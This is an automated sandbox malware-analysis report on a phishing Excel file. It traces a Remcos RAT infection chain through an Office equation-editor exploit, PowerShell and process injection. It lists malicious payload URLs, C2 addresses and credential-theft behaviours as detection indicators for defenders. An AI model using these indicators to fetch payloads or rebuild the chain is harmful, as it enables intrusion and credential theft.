                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe14_2_0040569A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information121
                Scripting
                Valid Accounts11
                Native API
                121
                Scripting
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                15
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts43
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                Bypass User Account Control
                21
                Obfuscated Files or Information
                211
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts123
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Access Token Manipulation
                1
                DLL Side-Loading
                2
                Credentials in Registry
                1
                System Service Discovery
                SMB/Windows Admin Shares2
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution
                Login Hook1
                Windows Service
                1
                Bypass User Account Control
                3
                Credentials In Files
                4
                File and Directory Discovery
                Distributed Component Object Model211
                Input Capture
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts3
                PowerShell
                Network Logon Script422
                Process Injection
                1
                Masquerading
                LSA Secrets38
                System Information Discovery
                SSH3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials3
                Security Software Discovery
                VNCGUI Input Capture114
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync21
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                Process Injection
                Proc Filesystem4
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery
                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500455 Sample: August Shipment - Inv No. 041.xls Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 61 a38.fr 2->61 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 21 other signatures 2->85 11 EXCEL.EXE 57 31 2->11         started        signatures3 process4 dnsIp5 65 137.184.234.91, 49166, 49173, 49174 PANDGUS United States 11->65 67 a38.fr 45.83.105.92, 443, 49165, 49167 NETCUP-ASnetcupGmbHDE Germany 11->67 53 August Shipment - Inv No. 041.xls (copy), Composite 11->53 dropped 55 weneednewthingstog...smoothbutter[1].doc, Rich 11->55 dropped 15 wscript.exe 1 11->15         started        18 WINWORD.EXE 348 31 11->18         started        file6 process7 dnsIp8 107 Suspicious powershell command line found 15->107 109 Wscript starts Powershell (via cmd or directly) 15->109 111 Very long command line found 15->111 119 3 other signatures 15->119 22 powershell.exe 4 15->22         started        63 a38.fr 18->63 43 C:\Users\user\AppData\Roaming\...\a38.fr.url, MS 18->43 dropped 45 C:\Users\user\AppData\Roaming\...behaviorgraphQ1oBm.url, MS 18->45 dropped 47 ~WRF{25DA551D-57C7...3-ACFA37B5F42F}.tmp, Composite 18->47 dropped 49 C:\Users\user\AppData\Local\...\4F3AD743.doc, Rich 18->49 dropped 113 Microsoft Office launches external ms-search protocol handler (WebDAV) 18->113 115 Office viewer loads remote template 18->115 117 Microsoft Office drops suspicious files 18->117 25 EQNEDT32.EXE 12 18->25         started        file9 signatures10 process11 file12 95 Suspicious powershell command line found 22->95 97 Suspicious execution chain found 22->97 28 powershell.exe 12 5 22->28         started        51 C:\Users\...\weneedsmoothbunwithbutterc.vBS, Unicode 25->51 dropped 99 Office equation editor establishes network connection 25->99 101 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 25->101 signatures13 process14 dnsIp15 69 ia803104.us.archive.org 207.241.232.154, 443, 49175 INTERNET-ARCHIVEUS United States 28->69 103 Writes to foreign memory regions 28->103 105 Injects a PE file into a foreign processes 28->105 32 RegAsm.exe 3 13 28->32         started        signatures16 process17 dnsIp18 57 45.90.89.98, 49177, 49178, 8243 CMCSUS Bulgaria 32->57 59 geoplugin.net 178.237.33.50, 49179, 80 ATOM86-ASATOM86NL Netherlands 32->59 71 Contains functionality to bypass UAC (CMSTPLUA) 32->71 73 Detected Remcos RAT 32->73 75 Tries to steal Mail credentials (via file registry) 32->75 77 7 other signatures 32->77 36 RegAsm.exe 1 32->36         started        39 RegAsm.exe 32->39         started        41 RegAsm.exe 11 32->41         started        signatures19 process20 signatures21 87 Tries to steal Instant Messenger accounts or passwords 36->87 89 Tries to steal Mail credentials (via file / registry access) 36->89 91 Searches for Windows Mail specific files 36->91 93 Tries to harvest and steal browser information (history, passwords, etc) 39->93

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                August Shipment - Inv No. 041.xls100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3AD743.doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{25DA551D-57C7-4B7F-89C3-ACFA37B5F42F}.tmp100%AviraEXP/CVE-2017-11882.Gen
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://b.scorecardresearch.com/beacon.js0%URL Reputationsafe
                http://acdn.adnxs.com/ast/ast.js0%URL Reputationsafe
                http://www.imvu.comr0%URL Reputationsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://support.google.com/chrome/?p=plugin_flash0%URL Reputationsafe
                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%URL Reputationsafe
                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%URL Reputationsafe
                http://cache.btrll.com/default/Pix-1x1.gif0%URL Reputationsafe
                http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                http://o.aolcdn.com/ads/adswrappermsni.js0%URL Reputationsafe
                http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://static.chartbeat.com/js/chartbeat.js0%URL Reputationsafe
                https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg100%URL Reputationmalware
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                http://137.184.234.91/77/RBCF.txt0%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%URL Reputationsafe
                https://ia803104.us.archive.org0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%URL Reputationsafe
                https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%URL Reputationsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%URL Reputationsafe
                http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%URL Reputationsafe
                45.90.89.980%Avira URL Cloudsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://www.ccleaner.com/go/app_cc_pro_trialkey0%URL Reputationsafe
                http://crl.entrust.net/server1.crl00%URL Reputationsafe
                http://137.184.234.910%Avira URL Cloudsafe
                https://contextual.media.net/8/nrrV73987.js0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                http://www.nirsoft.net0%Avira URL Cloudsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contextual.media.net/0%URL Reputationsafe
                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%URL Reputationsafe
                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%URL Reputationsafe
                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://a38.fr/GQ1oBmJ0%Avira URL Cloudsafe
                https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%URL Reputationsafe
                http://cdn.at.atwola.com/_media/uac/msn.html0%URL Reputationsafe
                http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%URL Reputationsafe
                https://secure.comodo.com/CPS00%URL Reputationsafe
                http://137.184.234.91/77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc0%Avira URL Cloudsafe
                https://policies.yahoo.com/w3c/p3p.xml0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                http://www.ebuddy.com0%URL Reputationsafe
                http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFC:0%Avira URL Cloudsafe
                https://a38.fr/0%Avira URL Cloudsafe
                https://ia803104.us.archive.org/27/items/vbs_20240LR0%Avira URL Cloudsafe
                http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFj0%Avira URL Cloudsafe
                http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                http://www.imvu.com/0K0%Avira URL Cloudsafe
                https://a38.fr/GQ1oBm0%Avira URL Cloudsafe
                http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIF0%Avira URL Cloudsafe
                http://www.msn.com/0%Avira URL Cloudsafe
                https://a38.fr/GQ1oBmyX0%Avira URL Cloudsafe
                http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                178.237.33.50
                truefalse
                  unknown
                  a38.fr
                  45.83.105.92
                  truetrue
                    unknown
                    ia803104.us.archive.org
                    207.241.232.154
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://137.184.234.91/77/RBCF.txttrue
                      • Avira URL Cloud: safe
                      unknown
                      45.90.89.98true
                      • Avira URL Cloud: safe
                      unknown
                      http://137.184.234.91/77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doctrue
                      • Avira URL Cloud: safe
                      unknown
                      https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgtrue
                      • URL Reputation: malware
                      unknown
                      https://a38.fr/GQ1oBmfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      unknown
                      http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFtrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://b.scorecardresearch.com/beacon.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://acdn.adnxs.com/ast/ast.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.imvu.comrRegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://137.184.234.91powershell.exe, 0000000D.00000002.465020760.0000000002772000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ia803104.us.archive.orgpowershell.exe, 0000000D.00000002.465020760.00000000025BA000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net03powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000F.00000002.498150575.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.nirsoft.netRegAsm.exe, 0000000F.00000002.497810329.00000000003B4000.00000004.00000010.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://deff.nelreports.net/api/report?cat=msnbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://a38.fr/GQ1oBmJAugust Shipment - Inv No. 041.xlsfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://cache.btrll.com/default/Pix-1x1.gifbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.google.comRegAsm.exe, RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gp/Cpowershell.exe, 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://o.aolcdn.com/ads/adswrappermsni.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.msn.com/?ocid=iehpbhvB5B9.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/powershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvB5B9.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://static.chartbeat.com/js/chartbeat.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.msn.com/de-de/?ocid=iehpbhvB5B9.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFC:EQNEDT32.EXE, 00000009.00000003.443731290.0000000000323000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://login.yahoo.com/config/loginRegAsm.exefalse
                      • URL Reputation: safe
                      unknown
                      http://www.nirsoft.net/RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net0Dpowershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.469486699.0000000002481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.465020760.0000000002481000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ia803104.us.archive.org/27/items/vbs_20240LRpowershell.exe, 0000000B.00000002.469486699.00000000025D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://a38.fr/a38.fr.url.4.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvB5B9.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.imvu.com/0KRegAsm.exe, 00000011.00000002.494226172.00000000002AC000.00000004.00000010.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.ccleaner.com/go/app_cc_pro_trialkeybhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.entrust.net/server1.crl0powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contextual.media.net/8/nrrV73987.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000011.00000002.495074136.0000000000859000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contextual.media.net/bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFjEQNEDT32.EXE, 00000009.00000002.444358881.00000000002AF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://www.msn.com/bhvB5B9.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://a38.fr/GQ1oBmyX~DF7D504418A9804062.TMP.0.dr, C9730000.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://cdn.at.atwola.com/_media/uac/msn.htmlbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.google.com/accounts/serviceloginRegAsm.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      https://secure.comodo.com/CPS0powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://policies.yahoo.com/w3c/p3p.xmlbhvB5B9.tmp.15.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.msn.com/advertisement.ad.jsbhvB5B9.tmp.15.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      137.184.234.91
                      unknownUnited States
                      11003PANDGUStrue
                      207.241.232.154
                      ia803104.us.archive.orgUnited States
                      7941INTERNET-ARCHIVEUStrue
                      45.90.89.98
                      unknownBulgaria
                      33657CMCSUStrue
                      45.83.105.92
                      a38.frGermany
                      197540NETCUP-ASnetcupGmbHDEtrue
                      178.237.33.50
                      geoplugin.netNetherlands
                      8455ATOM86-ASATOM86NLfalse
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1500455
                      Start date and time:2024-08-28 13:59:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 1s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:19
                      Number of new started drivers analysed:1
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:August Shipment - Inv No. 041.xls
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.expl.evad.winXLS@17/33@10/5
                      EGA Information:
                      • Successful, ratio: 71.4%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 176
                      • Number of non-executed functions: 321
                      Cookbook Comments:
                      • Found application associated with file extension: .xls
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Override analysis time to 48555.7973282972 for current running targets taking high CPU consumption
